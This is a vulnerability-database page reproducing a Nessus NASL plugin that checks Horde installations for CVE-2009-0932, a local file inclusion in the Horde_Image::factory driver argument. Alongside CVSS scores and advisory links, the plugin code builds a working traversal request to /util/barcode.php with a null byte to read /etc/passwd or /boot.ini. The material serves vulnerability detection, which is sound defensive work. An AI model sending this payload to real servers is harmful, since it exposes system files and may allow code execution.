Lucene search
This script is Copyright (C) 2009-2022 and is owned by Tenable, Inc. or an Affiliate thereof.HORDE_IMAGE_DRIVER_TYPE_LFI.NASLHistoryJan 29, 2009 - 12:00 a.m.
Horde Horde_Image::factory driver Argument Local File Inclusion
2009-01-2900:00:00
This script is Copyright (C) 2009-2022 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
52
6.4 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:P/A:N
0.04 Low
EPSS
Percentile
92.2%
The version of Horde, Horde Groupware, or Horde Groupware Webmail Edition installed on the remote host fails to filter input to the βdriverβ argument of the βHorde_Image::factoryβ method before using it to include PHP code in βlib/Horde/Image.phpβ. Regardless of PHPβs βregister_globalsβ and βmagic_quotes_gpcβ settings, an unauthenticated attacker can exploit this issue to view arbitrary files or possibly to execute arbitrary PHP code on the remote host, subject to the privileges of the web server user id.
Note that this install is also likely affected by a cross-site scripting issue in the βservices/portal/cloud_search.phpβ script although Nessus has not checked for that.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(35554);
script_version("1.18");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-2009-0932");
script_bugtraq_id(33491);
script_xref(name:"SECUNIA", value:"33695");
script_name(english:"Horde Horde_Image::factory driver Argument Local File Inclusion");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is susceptible
to a local file include attack.");
script_set_attribute(attribute:"description", value:
"The version of Horde, Horde Groupware, or Horde Groupware Webmail
Edition installed on the remote host fails to filter input to the
'driver' argument of the 'Horde_Image::factory' method before using it
to include PHP code in 'lib/Horde/Image.php'. Regardless of PHP's
'register_globals' and 'magic_quotes_gpc' settings, an unauthenticated
attacker can exploit this issue to view arbitrary files or possibly to
execute arbitrary PHP code on the remote host, subject to the
privileges of the web server user id.
Note that this install is also likely affected by a cross-site
scripting issue in the 'services/portal/cloud_search.php' script
although Nessus has not checked for that.");
script_set_attribute(attribute:"see_also", value:"https://lists.horde.org/archives/announce/2009/000482.html");
script_set_attribute(attribute:"see_also", value:"https://lists.horde.org/archives/announce/2009/000483.html");
script_set_attribute(attribute:"see_also", value:"https://lists.horde.org/archives/announce/2009/000486.html");
script_set_attribute(attribute:"see_also", value:"https://lists.horde.org/archives/announce/2009/000487.html");
script_set_attribute(attribute:"see_also", value:"https://lists.horde.org/archives/announce/2009/000488.html");
script_set_attribute(attribute:"see_also", value:"https://lists.horde.org/archives/announce/2009/000489.html");
script_set_attribute(attribute:"solution", value:
"If using Horde, upgrade to version 3.3.3 / 3.2.4 or later.
If using Horde Groupware, upgrade to version 1.2.2 / 1.1.5 or later.
If using Horde Groupware Webmail Edition, upgrade to version 1.2.2 /
1.1.5 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"d2_elliot_name", value:"Horde < 3.3.2 LFI");
script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
script_set_attribute(attribute:"canvas_package", value:"D2ExploitPack");
script_cwe_id(22);
script_set_attribute(attribute:"plugin_publication_date", value:"2009/01/29");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:horde:horde_application_framework");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2009-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("horde_detect.nasl", "os_fingerprint.nasl");
script_require_keys("www/horde");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("data_protection.inc");
port = get_http_port(default:80);
if (!can_host_php(port:port)) exit(0, "The web server on port "+port+" does not support PHP.");
# Try to retrieve a local file.
os = get_kb_item("Host/OS");
if (os)
{
if ("Windows" >< os) file = '/boot.ini';
else file = '/etc/passwd';
files = make_list(file);
}
else files = make_list('/etc/passwd', '/boot.ini');
files = make_list(files, 'js/addEvent.php');
file_pats = make_array();
file_pats['/etc/passwd'] = "root:.*:0:[01]:";
file_pats['/boot.ini'] = "^ *\[boot loader\]";
file_pats['js/addEvent.php'] = "\$Horde: horde/js/addEvent\.php";
# Test an install.
install = get_kb_item(string("www/", port, "/horde"));
if (isnull(install)) exit(0, "Horde was not detected on port "+port);
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!isnull(matches))
{
dir = matches[2];
# Loop through files to look for.
foreach file (files)
{
if (file[0] == '/') traversal = crap(data:"../", length:3*9) + '..';
else traversal = '../../../';
if (substr(file, strlen(file)-4) == ".php")
exploit = string(traversal, substr(file, 0, strlen(file)-4-1));
else
exploit = string(traversal, file, "%00");
url = string(
dir, "/util/barcode.php?",
"type=", exploit
);
res = http_send_recv3(method:"GET", item:url, port:port);
if (isnull(res)) exit(1, "The web server on port "+port+" failed to respond.");
# There's a problem if we see the expected contents.
pat = file_pats[file];
if (egrep(pattern:pat, string:res[2]))
{
if (report_verbosity > 0)
{
if (os && "Windows" >< os) file = str_replace(find:'/', replace:'\\', string:file);
report = string(
"\n",
"Nessus was able to exploit the issue to retrieve the contents of\n",
"'", file, "' on the remote host using the following URL :\n",
"\n",
" ", build_url(port:port, qs:url), "\n"
);
if (report_verbosity > 1)
{
if ("Call to undefined method PEAR_Error::" >< res[2])
res[2] = res[2] - strstr(res[2], "<br />");
res[2] = data_protection::redact_etc_passwd(output:res[2]);
report += string(
"\n",
"Here are its contents :\n",
"\n",
crap(data:"-", length:30), " snip ", crap(data:"-", length:30), "\n",
res[2],
crap(data:"-", length:30), " snip ", crap(data:"-", length:30), "\n"
);
}
security_hole(port:port, extra:report);
}
else security_hole(port);
exit(0);
}
}
}
| Vendor | Product | Version | CPE |
|---|---|---|---|
| horde | horde_application_framework | cpe:/a:horde:horde_application_framework |
References
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0932
lists.horde.org/archives/announce/2009/000482.html
lists.horde.org/archives/announce/2009/000483.html
lists.horde.org/archives/announce/2009/000486.html
lists.horde.org/archives/announce/2009/000487.html
lists.horde.org/archives/announce/2009/000488.html
lists.horde.org/archives/announce/2009/000489.html
Related
openvas
openvas
Horde Products Local File Include and XSS Vulnerabilities
2009-04-10 00:00:00
Horde Products Local File Include and Cross Site Scripting Vulnerabilities
2009-04-10 00:00:00
Horde Products Local File Inclusion Vulnerability
2011-02-17 00:00:00
nuclei
nuclei
Horde/Horde Groupware - Local File Inclusion
2021-07-27 05:32:32
cvelist
cvelist
CVE-2009-0932
2009-03-17 21:00:00
seebug
seebug
Horde Horde_Image::factory driver Argument Local File Inclusion
2014-07-01 00:00:00
HordeδΊ§εζ¬ε°ζδ»Άε
ε«εθ·¨η«θζ¬ζΌζ΄
2009-03-19 00:00:00
exploitpack
exploitpack
Horde - Horde_Image::factory driver Argument Local File Inclusion
2011-02-11 00:00:00
ubuntucve
ubuntucve
CVE-2009-0932
2009-03-17 00:00:00
cve
cve
CVE-2009-0932
2009-03-17 21:30:00
packetstorm
packetstorm
Horde Local File Inclusion
2011-02-11 00:00:00
dsquare
dsquare
Horde < 3.3.2 LFI
2012-02-01 00:00:00
nvd
nvd
CVE-2009-0932
2009-03-17 21:30:00
prion
prion
Directory traversal
2009-03-17 21:30:00
d2
d2
DSquare Exploit Pack: D2SEC_HORDE
2009-03-17 21:30:00
exploitdb
exploitdb
Horde - Horde_Image::factory driver Argument Local File Inclusion
2011-02-11 00:00:00
nessus
nessus
openSUSE 10 Security Update : horde (horde-6099)
2009-03-24 00:00:00
openSUSE Security Update : horde (horde-657)
2009-07-21 00:00:00
Debian DSA-1765-1 : horde3 - Multiple vulnerabilities
2009-04-09 00:00:00
debian
debian
[SECURITY] [DSA 1765-1] New horde3 packages fix several vulnerabilities
2009-04-08 13:22:34
[SECURITY] [DSA 1765-1] New horde3 packages fix several vulnerabilities
2009-04-08 13:22:34
osv
osv
horde3 - several vulnerabilities
2009-04-08 00:00:00
securityvulns
securityvulns
gentoo
gentoo
Horde: Multiple vulnerabilities
2009-09-12 00:00:00
fedora
fedora
[SECURITY] Fedora 13 Update: horde-3.3.6-1.fc13
2010-04-01 17:20:56
[SECURITY] Fedora 12 Update: horde-3.3.6-1.fc12
2010-04-01 01:51:02
[SECURITY] Fedora 11 Update: horde-3.3.6-1.fc11
2010-04-01 01:40:32
6.4 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:P/A:N
0.04 Low
EPSS
Percentile
92.2%
Related for HORDE_IMAGE_DRIVER_TYPE_LFI.NASL